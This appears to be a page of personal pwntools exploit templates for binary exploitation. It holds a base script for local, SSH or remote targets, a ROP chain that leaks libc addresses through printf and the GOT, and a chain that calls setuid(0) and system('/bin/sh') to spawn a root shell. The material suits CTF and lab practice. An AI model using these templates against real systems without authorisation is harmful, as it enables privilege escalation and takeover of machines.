Templates

Pwntools Linux Base
#!/usr/bin/env python3
from pwn import *
​
context.terminal = ['alacritty', '-e', 'zsh', '-c']
target = ''
​
context.binary = target
binary = ELF(target)
​
service_host = ""
service_port = 0
​
ssh_host = ''
ssh_user = ''
ssh_pass = ''
ssh_port = 22
​
if args['GDB']:
	p = gdb.debug(target,
	'''
	source /home/xct/tools/pwndbg/gdbinit.py
	continue
	''')
else:
	if args['SSH']:
		sh = ssh(host=ssh_host, user=ssh_user, password=ssh_pass, port=ssh_port)
		p = sh.run('/bin/bash')
		junk = p.recv(4096,timeout=2)
		p.sendline(target)
	else:
		if args['REMOTE']:			
			p = remote(service_host,service_port)
		else:
			p = process(target,setuid=True, level='DEBUG')
​
buf = b""
​
p.recvuntil("")
p.sendline(buf)
p.interactive()
Leak and jump back
rop = ROP(binary)
rop.call(binary.plt["printf"], [binary.got["printf"],"%s"])
rop.call(binary.symbols['_start'])
log.info(rop.dump())
​
buf = b""
buf += b"A"*100+rop.chain()
p.sendline(buf)
​
out = p.recvline()
out = out.strip(b"\n")
out = u64(out.ljust(8,b"\x00"))
Spawn Shell
rop = ROP(libc)
sh = next(libc.search(b"/bin/sh\x00"))
rop.call(libc.symbols['setuid'], [0x0])
rop.call(libc.symbols['system'], [sh])
log.info(rop.dump())
​
buf = b""
buf += b"A"*100+rop.chain()
p.sendline(buf)
p.interactive()
Compile Shellcode with Pwntools
from pwn import *
​
context.arch = 'amd64'
​
code = """
    // cpuid
    mov     rax, 0x00
    cpuid
    // exit
    mov     rdi, 0x00
    mov     rax, 60
    syscall
"""
​
elf = make_elf_from_assembly(code,extract=True) #, shared=1)
​
with open('cpuid', 'wb') as f:
    f.write(elf)

Path Hijacking

Misc

Last modified 6mo ago